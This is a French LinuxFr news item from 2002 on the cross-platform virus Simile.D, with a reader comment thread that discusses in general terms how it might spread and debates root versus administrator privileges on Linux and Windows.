Virus multiplate-formes Linux et Windows

Posté par  . Modéré par Amaury.
Étiquettes :
0
5
juin
2002
Linux
Ca y est le premier "vrai" virus qui affecte à la fois Windows et Linux est arrivé. Il s'appelle "Simile.D" et est polymorphe.

Petites précisions :
- il n'affecte que les machines Linux qui sont en mode super-utilisateur (ndm : huh ?)
- il affiche une boite de dialogue sous windows et écrit dans un terminal sous GNU/Linux.

Aller plus loin

  • # Pourquoi ?

    Posté par  (site web personnel) . Évalué à 10.

    Pourquoi à chaque nouveau "virus" linux, on nous raconte que celui-là c'est le vrai ?
    • [^] # Re: Pourquoi , mais surtout comment ?

      Posté par  . Évalué à 10.

      Bon voila, je ne suis pas un master, mais un truc m'échappe, comment un virus peut-il contaminer les fichiers d'un utilisateur sous Linux ?
      A ce que je sache il n'y a pas de moyen de lancer automatiquement un processus sous Linux, à moins de placer des entrées de le cron (ou autre), d'utiliser une faille dans un programme genre client mail ou web, ou alors de lancer un exécutable vérolé (mais si c'est par ce moyen, je n'appelle pas ça un virus).
      Si quelqu'un peut m'expliquer, j'aimerai bien comprendre.
      • [^] # Re: Pourquoi , mais surtout comment ?

        Posté par  . Évalué à 10.

        Le code du virus est un code x86, ce qui a priori est executable sur les deux. Ce code peut ouvrir un fichier, verifier si c'est un PE (MS) ou un ELF (Linux). Dans ce cas il doit, j'imagine, inserer le bon code dans le fichier.
        Pour le comment, voila un exemple (Traduit de /.)
        -Un utilisateur s'est installé un économiseur de la mort (infecté) sur son portable.
        -Le matin, il arrive avec son portable et le connecte au réseau de la boîte
        -Le virus scanne les partages réseaux (C'est une de ses particularités)
        -Il trouve un partage SAMBA avec un exe en rwxrwxrwx et le contamine
        -Un admin rézo en mal de sensations fortes l'execute en tant que root

        Voila, voila, avouez que vu le niveau de sécurité de certaines boîtes, ce n'est pas invraisemblable.
        • [^] # Re: Pourquoi , mais surtout comment ?

          Posté par  . Évalué à 10.

        • [^] # Re: Pourquoi , mais surtout comment ?

          Posté par  . Évalué à 10.

          c nul ce virus.... ca a été developper par microsoft ou koi?
          je m'attendait au un vrai truc du style acces au partoche linux depuis windows et contamination des executables de /bin ou meme du kernel mais la....chui presque decus....
          enfin bon ca prouve bien qu'il faut etre un manche pour se le choper sous nunux ce truc....
          • [^] # Re: Pourquoi , mais surtout comment ?

            Posté par  (site web personnel) . Évalué à 10.

            c nul ce virus...

            Peut être. En tout cas, pour 2 Ko de code, c'est déjà pas mal. Néanmoins, l'auteur a prouvé que c'était faisable, le code source circule et des variantes sont déjà apparues. Le code source pour accéder aux fichiers des partitions ext2, fat32 et ntfs est disponible, merci la GPL, donc on peut s'attendre à ce que des gens créent un virus un peu plus gros et un peu plus efficace.

            Je rappelle aussi qu'un des buts d'un virus c'est d'être tout petit, pour être difficile à détecter (oh, mon 'ls' est passé de 45 Ko à 364 Ko...), et celui-ci remplit extrèmement bien cette tâche. Symantec a dû ajouter de nouvelles routines spécifiques à la détection de ce virus, ce qui au passage pénalise la performance de leur anti-virus, et ça, c'est quelque chose qui n'arrive que tous les 36 du mois, d'après M. Solomon, auteur de l'anti-virus éponyme.
            • [^] # Re: Pourquoi , mais surtout comment ?

              Posté par  . Évalué à 9.

              Dans le liens sur le site de Symantec ils disent qu'un fichier infecté grossis en moyenne de 110ko, c'est pas exactement 2ko.
            • [^] # Re: Pourquoi , mais surtout comment ?

              Posté par  . Évalué à 10.

              Le code source pour accéder aux fichiers des partitions ext2, fat32 et ntfs est disponible, merci la GPL

              La spécif de la FAT 32 chez MS
              http://www.microsoft.com/hwdev/hardware/fatgen.asp(...)

              Du code BSD pour NTFS
              http://iclub.nsu.ru/~semen/ntfs/(...)

              Rien a voir avec la GPL ...
              • [^] # Re: Pourquoi , mais surtout comment ?

                Posté par  (site web personnel) . Évalué à -2.

                Oops, mon doigt a glissé, j'étais en train d'écouter RMS parlant de tout de rien (vie privée, GPL, DeCSS, Skylarov, bla bla bla) sur la BBC, alors bon, j'ai mis GPL au lieu d'open source. Sorry.

                Par contre je continue de penser qu'il vaut mieux avoir du code qui marche qu'une spécification plus ou moins vague.

                [-1] je me suis excusé, on va pas passer la nuit dessus.
                • [^] # Re: Pourquoi , mais surtout comment ?

                  Posté par  . Évalué à 7.

                  « Par contre je continue de penser qu'il vaut mieux avoir du code qui marche qu'une spécification plus ou moins vague. »

                  Tu connais des personnes qui pensent qu'il vaux mieux avoir du code qui ne marche pas ?

                  « alors bon, j'ai mis GPL au lieu d'open source »

                  Selon toi, la nature ouverte du logiciel libre rendrait plus simple la création de virus ?
        • [^] # Re: Pourquoi , mais surtout comment ?

          Posté par  . Évalué à 6.

          -Un utilisateur s'est installé un économiseur de la mort (infecté) sur son portable. <--- à flinguer

          -Un admin rézo en mal de sensations fortes l'execute en tant que root <--- idem
      • [^] # Re: Pourquoi , mais surtout comment ?

        Posté par  (site web personnel) . Évalué à 10.

        Si quelqu'un peut m'expliquer, j'aimerai bien comprendre.

        Il suffit de faire confiance à l'utilisateur ! Le rêve du virus (ou de son auteur) c'est de pouvoir contaminer ls, bash, X, enfin un des programmes que tu lances très régulièrement sur ta machine. À défaut, par exemple si tu n'es pas root, il se contentera de contaminer les exécutables contenus dans ton répertoire perso. Moins bien, mais on fait avec ce qu'on a, n'est-ce pas.

        Je te rappelle qu'un virus n'a pas à se lancer automatiquement. Par exemple, tu exécutes un programme vérolé, la partie « virus » du programme s'exécute donc comme tu l'as ordonné (enfin, toi, t'es pas au courant, bien sûr), contamine quelques fichiers sur ton disque, soit dans ton répertoire perso, soit en utilisant des failles de sécurité, éventuellement efface ou pire, corrompt une partie de tes données, et puis te rend tranquillement la main.

        Que dirais-tu d'un programme 'ls' qui contamine un exécutable et qui corrompt un de tes fichiers à chaque fois que tu tapes 'ls'. Le temps que tu t'aperçoives du problème, tu auras probablement lancé 'ls' un bon nombre de fois.
    • [^] # Re: Pourquoi ?

      Posté par  . Évalué à -7.

      Et comme par hasard à chaque fois ça ne marche que si on l'exécute en root (puisque je suppose que c'est la signification de "super-utilisateur" - c'est de la terminologie windowsienne, root c'était trop standard pour eux -).

      En clair, ça ne fait strictement rien sous linux à part attendre qu'on le renvoie sur une machine windows, sauf si on s'amuse à consulter ses mails en root. Mais les rigolos qui font ça auront bien cherché ce qui leur arrivera (pas grand chose en fait, d'aprés l'article).
      • [^] # Re: Pourquoi ?

        Posté par  (site web personnel) . Évalué à -10.

        Tu connais pas la commande "su" ?
        su = super utilisateur

        Sous Windows le terme "administrateur" est employé.

        L'association LinuxFr ne saurait être tenue responsable des propos légalement repréhensibles ou faisant allusion à l'évêque de Rome, au chef de l'Église catholique romaine ou au chef temporel de l'État du Vatican et se trouvant dans ce commentaire

        • [^] # Re: Pourquoi ?

          Posté par  . Évalué à 10.

          Je pense plutot que
          su = Switch User

          Si tu fais
          $ su marcel

          cela n'a rien à voir avec Super User.

          Sinon, je suis d'accord avec toi, super user est un mot courant sous unix pour designer Mr root
        • [^] # Re: Pourquoi ?

          Posté par  . Évalué à 10.

          Il me semble que su signifie en fait substitute user. Si aucun utilisateur n'est spécifié, alors c'est root par défaut.
          • [^] # Re: Pourquoi ?

            Posté par  . Évalué à 9.

            Il me semble que su signifie en fait substitute user.

            Et moi j'en suis même sûr.
            Et oui, super-utilisateur existe depuis longtemps sous *nix, j'avoue que c'était un gros troll, tellement gros d'ailleurs qu'il n'est pas passé (mais c'est la faute au modéro, il m'a tenté avec son "huh ?" : interdisons les modéros Désolé, je peux plus m'en empêcher, c'est la faute à la tr... Non, rien).

            Bon, -1, et je sens que ce n'est qu'un début.
        • [^] # Re: Pourquoi ?

          Posté par  . Évalué à 8.

          Tu connais pas la commande "su" ?
          su = super utilisateur


          Inexact.

          su = set user (ID) tout simplement.

          Tu peux entre autre devenir root mais c'est un utilisateur particulier.

          En plus, tant qu'à proposer quelque chose, vu l'origine, il aurait mieux valu dire super-user...

          PK
      • [^] # Re: Pourquoi ?

        Posté par  (site web personnel) . Évalué à 10.

        Que penses-tu du scénario suivant (pas réalisé par ce virus, mais il a fait un grand pas en avant) :


        • M. Vortalds a une machine où sont installés à la fois Windows et Linux. Ben ouais, il faut bien pouvoir regarder le DVD de Metropolis, et puis Dungeon Siege, c'est quand même bien cool.

        • Fatale erreur, un jour...

          • Pressé, il se connecte à Internet à partir de Windows. Son antivirus n'est pas à jour, il y a un trou quelque part, un ver/virus s'installe sur sa machine.

          • Il oublie de vérifier le crack qu'il vient de télécharger.

          • Il met une disquette dans son lecteur, et oublie de la scanner. Ça fait tellement longtemps qu'il n'utilise plus de disquette.

          • Etc.


        • Le virus est activé, par un clic innocent de souris, automatiquement grâce à la base de registre, etc.

        • Profitant du fait que M. Vortalds travaille en tant qu'Administrateur quand il est sous Windows, il accède à la table des partitions.

        • Le virus repère une partition ext2, et ô joie, il y a des répertoires bin, sbin dans la racine de cette partition : une partition root, on va pouvoir s'amuser !

        • Le virus infecte tous les fichiers qu'il trouve dans bin et sbin. Aucun mécanisme Unix ne peut l'en empêcher, car il est sous Windows, et Administrateur en plus.

        • M. Vortalds en ayant fini avec Windows, ayant besoin sans doute de se remettre à travailler, reboote sous Linux.

        • Bien sûr, sous Linux, il a accès en lecture et écriture à sa partition Windows.

        • Ce qui fait que quand il tape 'ls', le virus qui s'y trouve n'a aucun mal à contaminer les fichiers contenus dans le répertoire WINDOWS\SYSTEM32 de la partition Windows.



        Qu'est-ce qu'on s'amuse, non ? Bien sûr, avec quelques précautions de base, on peut améliorer sa sécurité, par exemple en utilisant des partitions séparées pour les données. Mais le concept du virus Lin/dows est quand même extrêmement puissant, et à surveiller de près.
        • [^] # Re: Pourquoi ?

          Posté par  . Évalué à 10.

          Bien sûr, avec quelques précautions de base, on peut améliorer sa sécurité

          ... En n'installant pas windows ;-)
        • [^] # Re: Pourquoi ?

          Posté par  . Évalué à 4.

          Le virus infecte tous les fichiers qu'il trouve dans bin et sbin. Aucun mécanisme Unix ne peut l'en empêcher, car il est sous Windows, et Administrateur en plus.
          Sous Linux il y a moyen d'avoir un système de fichiers encrypté :
          http://www.tldp.org/HOWTO/Loopback-Encrypted-Filesystem-HOWTO.html(...)
          Ça limite énormément l'infection par des systèmes extérieurs me semble-t-il.

          PS: oui, je sais, on doit pas dire "encrypté" :)
      • [^] # Re: Pourquoi ?

        Posté par  . Évalué à 10.

        Faux, su, ca veut dire "Saloperie d'User", une commande généralement utilisée quand on se mange un Permission Denied sur sa propre bécanne

        -> -1, c'était juste pour continuer la série de posts à ce sujet
    • [^] # Re: Pourquoi ?

      Posté par  (site web personnel) . Évalué à 8.

      Beinh en fait la recherche d'un vrai virus sous linux c'est comme une recherche scientifique. A chque fois on crois avoir trouvé le vrai et puis on se rend compte que ce n'est valable qu'a condition d'avoir un programme précis associé d'un utilisateur benêt et d'un admin enrhumé...

      La recherche continue. Symantec et CA ont des équipes de recherche entierement dévouées à ça.
      • [^] # Re: Pourquoi ?

        Posté par  (site web personnel) . Évalué à 4.

        La recherche continue. Symantec et CA ont des équipes de recherche entierement dévouées à ça.

        Il a clairement fallu plusieurs mois à l'auteur du virus pour le créer, et quelque chose comme deux mois à Symantec pour concevoir des routines à même de le détecter.
        • [^] # Re: Pourquoi ?

          Posté par  (site web personnel) . Évalué à 5.

          Je ne le crois pas. C'est plutôt Symantec qui a fait les deux. Je cite symantec ( http://securityresponse.symantec.com/avcenter/venc/data/linux.simil(...) ):
          "So far Symantec has not received any submissions of this virus from customers."
          Comment aurait-on pu mettre au point un anti-virus pour un virus que personne n'a jamais eu ?

          On a mis en prison un lhégémonie et leur arroganceampiste indonésien, mais on se garde bien de s'attaquer à une délinquance en cols blancs bien plus gigantesque car elle rapporte beaucoup de dollars. Ça me rappelle Bush qui disait "Je ne comprend pas qu'on puisse nous haïr, nous qui sommes si bon!". Je pense que le monde entier finira par haïr les USA s'ils ne changent pas leur comportement hégémonique et arrogant.
          • [^] # Re: Pourquoi ?

            Posté par  (site web personnel) . Évalué à -2.

            Comment aurait-on pu mettre au point un anti-virus pour un virus que personne n'a jamais eu ?

            Eux l'ont eu. Qu'est ce que tu crois ? Que les auteurs de virus ont envie d'attendre cinq ou six mois que le monde entier se mette à parler d'eux, si par chance leur virus devient suffisamment célèbre ? Attendre alors qu'ils viennent de se faire suer à programmer leur superbe machine à faire chier le monde ? Que nenni ! Ils envoient leurs oeuvres aux créateurs d'anti-virus. À plein de créateurs d'anti-virus. Dans l'espoir d'avoir leur quart d'heure de célébrité, voire même d'être publiés sur Yahoo! et de faire trembler dans les chaumières.

            Quant à ton deuxième paragraphe, tu ferais bien d'apprendre à faire du copier/coller, d'arrêter la fumette, d'ouvrir ta fenêtre, d'aller prendre l'air, et de réapprendre à connaître un monde certes pas parfait, ô non, mais bien loin de tes délires conspirationnesques. X-Files, c'est fini, et ça ne continue pas sur Internet.

            [-1] ça devient limite perso là
    • [^] # PUB

      Posté par  . Évalué à 8.

      J'aime bien la pub au milieu de ZDnet:


      DON'T BELIEVE IN MYTHS
  • # oups (comme le modero)

    Posté par  (site web personnel) . Évalué à -6.

    ... il n'affecte que les machines Linux qui sont en mode super-utilisateur..

    Ben oui, Windows est toujours en mode super-utilisateur.
    C'est pour cela qu'il est plus difficile d'écrire un virus pour une architecture où cela n'est pas par défaut.
    Mais bon, je ne pense pas que ce virus génera plus que cela les admin nunux puisque meme Mandrake (très orienté utilisateur final) ne fonctionne pas en mode super-utilisateur par défaut.
    • [^] # Re: oups (comme le modero)

      Posté par  . Évalué à 10.

      c est meme la seule ( a ma connaissance ) qui te previent avec un pop up en enorme que se loguer en root c est tres mal , avec un beau fond d ecran rouge vif .
      • [^] # Re: oups (comme le modero)

        Posté par  . Évalué à -7.

        alors il est coder par mdk parceke chez mdk il aime bien le root en rouge
        • [^] # Re: oups (comme le modero)

          Posté par  . Évalué à 6.

          Il parlait pas du virus, mais de la connection en root sur mdk.

          D'ailleur la première fois ça impressione ce fond d'écran rouge. On a vraiment l'impression d'avoir fait une connerie (c'est un peu ça).
          • [^] # Re: oups (comme le modero)

            Posté par  . Évalué à -1.

            oui c'est même beacoup sa ! Se logguer dans une session X sous root c'est comme si tu te trouver sous windows !
      • [^] # Re: oups (comme le modero)

        Posté par  (site web personnel) . Évalué à -9.

        Oui c'est pas bien d'ailleurs je le fait tout le temps :)

        J'aime vivre dangereusement.
      • [^] # Re: oups (comme le modero)

        Posté par  . Évalué à 0.

        la config gnome de redhat previent aussi du danger lorsque l'on se loggue root (mais se logguer root sous Gnome + X11 ce devient vraiment de la provoc :-)
        • [^] # Re: oups (comme le modero)

          Posté par  (Mastodon) . Évalué à 5.

          se logguer root sous Gnome

          J'ai connu un débile qui faisait ça tout le temps, on pouvait rien lui dire, il avait 'couché' et il était donc "directeur technique". Il nous a quand même flingué 4 serveurs en un an... Donc des c*ns comme ça, on en trouve aussi aux postes de responsabilité.

          La commande find pour trouver les fichiers dans lequel un autre user pourrait écrire, c'est quoi exactement, déja ?
    • [^] # Re: oups (comme le modero)

      Posté par  (site web personnel) . Évalué à 10.

      Ben oui, Windows est toujours en mode super-utilisateur.

      Que signifie cette phrase ? Windows NT, 2k et XP sont des systèmes multi-utilisateurs tout comme Linux. Le danger vient plus d'une utilisation abusive du compte d'Administrateur que d'un défaut de conception. Après ce n'est qu'une question d'éducation dans les comportements.

      Peut-être pensais-tu aux Windows 9x mais on ne devrait même pas en parler lorsqu'on les compare aux distributions actuelles Linux.

      puisque meme Mandrake ne fonctionne pas en mode super-utilisateur par défaut.

      Pas grand chose à dire de plus que Houplaboom au-dessus. Mandrake fait tout pour dissuader l'utilisateur du compte root comme compte par défaut. Manque de finesse ton troll...

      Pensez à l'environnement avant d'imprimer ce commentaire - Please consider the environment before printing this comment

      • [^] # Re: oups (comme le modero)

        Posté par  . Évalué à 10.

        le danger vient plus d'une utilisation abusive du compte d'Administrateur que d'un défaut de conception

        J'ai vu des installation de NT4 et win2k, jamais il n'était proposé à la fin de l'installation la création d'un compte utilisateurs, alors que toutes les installation Linux (celle que j'ai faites du moins) le propose (si elle ne l'impose) d'office.

        En entreprise les comptes existent sous windows mais chez un particulier je ne l'ai jamais vu...
        Le seul que je connaisse qui a un compte utilisateur sous win2k est un copain a qui j'ai du expliquer au moins pendent 2h qu'un mot de passe n'est pas inutil et qu'un compte utilisateur est nécessaire, la question de base était: "comment virer la boite de login"...

        Au niveau conceptuel ça existe, mais pour l'immense majorité des particuliers windows est mono-utilisateur root simplement parce qu'ils ne savent pas ce qu'est un compte utilisateur, ni même que ça existe.
        • [^] # Re: oups (comme le modero)

          Posté par  . Évalué à 5.

          C'est pire que ça. A la fin de l'installation de 2000 (les autres je sais pas), il propose de dcréer un ou plusieurs comptes administrateurs. Hors, et ce n'est pas précisé, ces comptes sont créés dans le groupes administrateurs, donc ont les mêmes droits que l'administrateur.

          Mais signalons à la décharge de MS qu'il existe une fonction "executer en tant que..." qui permet de lancer un programme avec une identitée différente de celle de l'utilisateur courant, comme par exemple "root".
          • [^] # Re: oups (comme le modero)

            Posté par  . Évalué à -5.

            Non non, a la fin de l'install de Windows 2000 Pro(pas server/adv server), tu peux ajouter des utilisateurs a ton systeme, mais tu as le choix du groupe dans lequel tu les mets(dans un drop down menu), t'es pas oblige de les mettre dans le groupe admin.
            • [^] # Re: oups (comme le modero)

              Posté par  . Évalué à 10.

              Ce soir, j'ai un acquis de concience d'enfer, j'ai été reveillé une vieille machine pour y installer un windows 2000 pro, en faisant attention à ce qui se passe au niveau des comptes utilisateurs.

              tapez votre nom(a), votre nom de machine, blabla, copie des fichiers, blablabla, tapez le mot de passe administrateur, OK, ça continue de mouliner, reboote. Après il se passe plus rien d'interressant jusqu'a la configuration du login. Il me demande si je veux me logger automatiquement, je répond oui (j'aime le risque) et il me propose deux comptes : administrateur et le nom d'utilisateur rentré en (a). Je choisi le compte (a), je vais dans le gestionnaire d'utilisateurs et j'ai ça :

              http://kadreg.free.fr/perso/moules/users-win2000.png(...)

              Le compte créé à l'install est bien administrateur, et je n'ai pas vu de combo pour qu'il ne le soit pas.
          • [^] # Re: oups (comme le modero)

            Posté par  (site web personnel) . Évalué à 4.

            La fonction "executer en tant que..." sous 2000 elle existe mais je crois bien que MS a oublié de la documenté (histoire qu'on ne l'utilise pas?)
            Pour XP je sais pas...
      • [^] # Re: oups (comme le modero)

        Posté par  (site web personnel) . Évalué à 4.

        En effet mais,

        Je ne connais pas trés bien NT, win2000 et XP, mais pour pouvoir faire un tache d'administration, et donc passer en mode administrateur il faut se deconnecter et se reconnecter en Administrateur, et donc fermer tout ce qu'on est en train de faire, c'est plutôt penible.

        Je ne crois pas en effet qu'il existe d'équivalence a la commande su sous win(et je vois pas comment implementer ca en mode entierement graphique d'ailleur).

        Donc par commodité tout le monde est a un compte équivalent a celui de l'administrateur, tout du moins c'est comme ca que ca se passe dans ma boite et je n'oserais pas essayer d'imposer l'utilisation d'utilisateur avec des droits restraints (question de survie personnelle).

        Donc c'est bien d'un défaut/manque de conception que viens l'utilisation abusive du compte Administrateur.
        • [^] # Re: oups (comme le modero)

          Posté par  . Évalué à 8.

          Il ya une commande : runas je crois...
          Il y a aussi une infame manip :
          Dans un explorateur, cliquer avec le bouton avec la touche shift enfonçée, et miracle, on a une entrée supplémentaire qui permais d'exécuter en tant que...
          Evidement, pour MS, c'est le genre de truc à cacher et à n'enseigner qu'aux cours de certification...

          Je fais mes mises à jour windowsupdate / install de soft comme ça au boulot.
          Attention, pour windows update, il faut lancer directement iexplore.exe, le raccourcis ne marche pas avec cette methode.
          • [^] # Re: oups (comme le modero)

            Posté par  . Évalué à -5.

            C'est vrai que su est mis bien plus en avant dans Linux, t'as des pop-ups qui s'affichent partout toutes les 5 minutes pour te rappeler que su existe.

            Non ?
        • [^] # Re: oups (comme le modero)

          Posté par  . Évalué à 0.

          Toi tu lis pas souvent linuxfr.org, ca doit bien faire la 585eme fois que je le dis:

          runas.exe, en command line.
        • [^] # Re: oups (comme le modero)

          Posté par  . Évalué à 0.

          Tu ne connais pas trés bien Windows Xp en tout cas.
          Car il existe d'office le moyen de basculer d'un utilisateur à un autre sans pour autant quitter les tâches du premier et donc, par extension de passer en utilisateur privilégié. Oui, privilégié, parce qu'on doit définit si tel ou tel utilisateur est considéré administrateur du poste ou non.
          Sous NT ou 2k, par contre, je ne sais pas, au vu des mes potes gamerz, ça avait l'air nouveau sous xp...
      • [^] # Re: oups (comme le modero)

        Posté par  . Évalué à -2.


        Windows NT, 2k et XP sont des systèmes multi-utilisateurs tout comme Linux.


        Je crains que non, si je ne m'abuse, un système multiutilisateur, c'est un système où l'on peut travailler simultanément à plusieurs sur la même machine. Il me semble que sous windows ce n'est pas possible (je doute que l'accès à une console DOS émulée soit suiffisante pour parler de multiutilisateurs).

        Etienne
        • [^] # Re: oups (comme le modero)

          Posté par  . Évalué à 5.

          Terminal Services...
          • [^] # Re: oups (comme le modero)

            Posté par  . Évalué à -2.

            Au temps pour moi.


            -1 (ca va pas interresser grand monde)
          • [^] # Re: oups (comme le modero)

            Posté par  . Évalué à 2.

            Terminal Services n'est pas inclus en standard quand on achète un NT ou un 2k ! donc non, NT et 2k de base ne le sont pas !

            De plus, je doute qu'il y ait une version Terminal Services de XP à ce jour mais pBpG pourra le confirmer ou l'infirmer...
            • [^] # Re: oups (comme le modero)

              Posté par  . Évalué à 2.

              Terminal Services est en standard sur Win2k Server/Adv Srv/Datacenter.

              Terminal Services est en standard dans... NT4 Terminal Server Edition.
              • [^] # Re: oups (comme le modero)

                Posté par  . Évalué à 0.

                Mais pas dans Win2000 pro. Et Win2000 Server, c'est minimum 6000 balles. Ouch ... 'faut en avoir l'utilité, et c'est bien dommage, car ça serait pratique. Microsoft a vraiment une politique de licence à la con. Un de ces 4', ça va leur retomber sur le coin de la gueule.
                Enfin, je dis juste ça au cas où tu aurais des commerciaux dans tes relations :)
                • [^] # Re: oups (comme le modero)

                  Posté par  . Évalué à 0.

                  Oui mais il y a une bonne raison...

                  Terminal Services c'est fait soit pour:

                  1) se connecter a sa propre machine depuis chez soi
                  2) travailler a plusieurs sur une machine

                  Le point 2) signifie que c'est un serveur --> Win2k Server/AdvSrv/...

                  Le point 1), ben tu peux le faire avec WinXP Pro/Home.

                  Les gens sont pas sense se connecter a 20 sur une workstation, c'est sense etre la machine d'une seule personne.
      • [^] # Re: oups (comme le modero)

        Posté par  . Évalué à 2.

        Windows NT, 2k et XP sont des systèmes multi-utilisateurs tout comme Linux

        A un petit détail près, c'est que sous Win2K, le premier utilisateur créé après 'Administrateur' se voit également attribué les droits d'admin. Il a donc tous les droits pour faire aussi des grosses conneries :(
    • [^] # Re: oups (comme le modero)

      Posté par  (site web personnel) . Évalué à 0.

      Ben oui, Windows est toujours en mode super-utilisateur.

      D'autres l'ont dit, alors répétons : non. Mais en pratique, oui, assez souvent.

      C'est pour cela qu'il est plus difficile d'écrire un virus pour une architecture où cela n'est pas par défaut.

      Non. C'est aussi facile. Par contre, le virus aura plus de mal à se diffuser, ou alors il faudra créer des mécanismes plus subtil pour améliorer ses chances de se diffuser. Pour ce que j'en sais, il n'est pas très dur d'obtenir un accès root une fois que l'on est loggué en tant qu'utilisateur d'une machine. Il y a beaucoup de programmes qui ont des vulnérabilités dites « locales ».

      (...) ne fonctionne pas en mode super-utilisateur par défaut

      Et ? Imaginons que tu exécutes un virus en tant qu'utilisateur normal. Flûte alors, il ne peut pas contaminer d'autres exécutables dans /bin. Pauvre virus. Par contre, il peut effacer tout ton répertoire perso sans aucune difficulté. Un système d'exploitation, ça se réinstalle en quelques heures. Tes données persos, il te faudra combien de temps pour les récupérer ? Pourras-tu même les récupérer ? Tes sauvegardes sont-elles bien à jour ? Et, rigolons un peu, si au lieu d'effacer tes fichiers le virus les corrompait subtilement ? Si tu mettais des mois à t'en apercevoir ? Tu as toujours tes sauvegardes d'il y a quatre mois ?
  • # multiplate-formes ?

    Posté par  . Évalué à 7.

    il est écrit en java pour être multiplate-formes ?

    [-1] et je --->[]
  • # hoax ?

    Posté par  (site web personnel) . Évalué à 10.

    Quelqu'un deja vue passer ce virus ?
    Par ce que ce ne serait pas la premiére fois qu'on invente un joli virus pour vendre sont produit...
    • [^] # Re: hoax ?

      Posté par  (site web personnel) . Évalué à -3.

      C'est le cas, il suffit de lire l'aticle de Symantec qui dit que personne ne l'a encore rencontré (Sauf Symantec).
      J'en déduis 2 conclusions ;
      - Symantec est à l'origine du virus.
      - C'est un hoax à but commercial.

      Avec Linux, on fait de la prévention. Microsoft préfère ne pas en faire et oblige l'emploi de techniques curatives (antivirus) beaucoup plus lourdes. C'est un peu comme si, pour le sida, on préférait la trithérapie au préservatif.
      Chacun sait que la prévention est beaucoup moins coûteuse et plus efficace que le traitement curatif.
      • [^] # Re: hoax ?

        Posté par  (site web personnel) . Évalué à 4.

        Avec Linux, on fait de la prévention. Microsoft préfère ne pas en faire et oblige l'emploi de techniques curatives

        Loin de moins l'idée de donner l'avantage du coté de Windows sur la résistance aux virus mais j'aimerai bien savoir ce que fait un linux de base (sans les 150 patch noyeaux) de plus "préventif" que windows (nt/2k/xp) ?

        Parce que d'apres moi il y a quelques choses uniquement qui limitent les virus sur unix par rapport à windows:

        - le fait que ca concerne plein d'architectures et que si on ne se concentre que sur 1 Unix particulier et 1 architecture (imaginons linux/i386) ca concerne relativement peu de monde (comparé à windows/i386)

        - le fait que la plupart des unix sont pour des serveurs où on ne fait pas des téléchargements de conneries/warez, où celui qui s'en sert ne va certainement pas s'en servir pour lire ses mails et cliquer sur la piece jointe avec un compte administrateur/root. Windows bien que touchant "aussi" les serveurs, représente surtout l'essentiel du grand public (donc la base facile à infecter pour répendre le virus)

        Parce que la séparation des pouvoirs (login/groupes) existe aussi sous windows (je dirais meme qu'elle est mieux faite sous windows, la granularité est meilleure), si elle est utilisée comme il faut elle est aussi efficace (voire plus) sur Windows que sur Unix.
        Apres reste le nombre de failles et le délai de publication des mises à jours, mais là ca ne rentre pas dans la prévention que tu attribue à linux (vu qu'on rentre dans le curatif, pour linux aussi)

        La plupart des raisons tiennent surtout à la personne qui est devant la machine, et ca ca n'est pas la faute de windows.
  • # Infos chez Symantec

    Posté par  . Évalué à 10.

    Un peu plus intéressantes que celles de ZDnet, tout de même :)

    ==> http://securityresponse.symantec.com/avcenter/venc/data/linux.simil(...)
    • [^] # Re: Infos chez Symantec

      Posté par  . Évalué à 10.

      Voilà, donc pour attaper ce virus, il faut :
      - récupérer un éxécutable ELF d'une source peu sûre
      et s'amuser à l'exécuter en root
      - Se connecter en root à une machine win en lui laissant l'accés complet au disque

      suite à quoi le méchant infecte tous les ELF qu'il trouve.

      (j'ai bon? Autre chose?)

      SAI RAIVAULUSIONNEIRE!
      Le seul truc qui est peut-être un peu nouveau sont les procédés employés pour masquer la présence du virus.

      C'est pas demain la veille que j'installe un antivirus.
      • [^] # Re: Infos chez Symantec

        Posté par  . Évalué à 2.

        T'as presque mais pas bon.

        Si tu l'execute en user il infectera les binaires sur lequels ton user a le droit d'ecrire.

        Et le jour ou tu lanceras un de ces binaires en etant root, hop le virus se lance et il a acces a toute ta machine car le binaire tourne alors avec les droits root.
        • [^] # Re: Infos chez Symantec

          Posté par  . Évalué à 4.

          A part make et vi, je lance pas grand chose en root, et encore moins des softs qui trainent dans l'installation d'un utilisateur, donc les risques diminuent vite.
          • [^] # Re: Infos chez Symantec

            Posté par  . Évalué à 5.

            Moi je lance apt-get. Et emacs aussi, mais ça c'est parceque vi suce des koalas mauves.

            (-1)
        • [^] # Re: Infos chez Symantec

          Posté par  (site web personnel) . Évalué à 0.

          Si tu l'execute en user il infectera les binaires sur lequels ton user a le droit d'ecrire.

          Je rappelle qu'à défaut d'obtenir directement un accès root à partir du monde extérieur, un pirate cherche à tout le moins de récupérer un shell utilisateur d'où il pourra tenter d'exploiter un trou de sécurité local, nettement plus nombreux et variés.

          Bref, on pourrait tout à fait imaginer un virus équipé pour craquer la machine localement. Ou tout simplement pour ouvrir une connection avec la machine de son auteur (pas très fin, ça, je vous l'accorde), afin que celui-ci puisse venir faire un tour chez vous, en votre nom.

          Et puis, pour moi, ce qui compte, c'est la sécurité de mes données. Si un virus vient les tripatouiller, ça ne va pas trop me plaire. Oui, j'ai des backups, mais quand même.
    • [^] # je ne vais pas pleurer

      Posté par  (site web personnel) . Évalué à 2.

      J'ai parfois tendance à plaindre ceux qui ont perdu des heures de boulot suite à un virus sous MS Windows. Mais si ce virus est réel, je ne pleurerai pas sur ceux qui ne devront s'en prendre qu'à eux !
      Sous Windows tout le monde a tous les droits. Sous GNU/Linux, pour être root, il faut le vouloir. Alors si un jour quelqu'un se chope ce virus, moi je dis : BIEN FAIT !

      PS : et l'argument du "c'est ma machine alors je me mets root" se complétera alors par "je peux même tout y flinguer" (:
      • [^] # Re: je ne vais pas pleurer

        Posté par  . Évalué à 6.

        Sous Windows tout le monde a tous les droits.

        C'est faux.

        P*tain de bordel de m*, je vais me mettre moi aussi a sortir des conneries de ce niveau sur Linux, on va voir combien de temps je tiens avant de me faire incendier comme quoi je fais du FUD, mensonges, propagande,...
        • [^] # Re: je ne vais pas pleurer

          Posté par  . Évalué à 4.

          C'est faux? Oui et non

          Ca dépend de quel windows on parle évidemment :)
        • [^] # Re: je ne vais pas pleurer

          Posté par  . Évalué à 4.

          On est tous bien d'accord avec toi, je pense, mais je me pose quand même une question :

          Lors de l'installation de toutes les distributions de GNU/linux que j'ai testé, lorsqu'on en arrive à la création d'utilisateurs, il y a un texte plus ou moins long expliquant que c'est très très Mal(tm) de se loguer en root, et de ne pas mettre de mots de passe. On peut le faire, mais c'est trés vivement déconseillé, et il faut vraiment le vouloir pour passer outre.
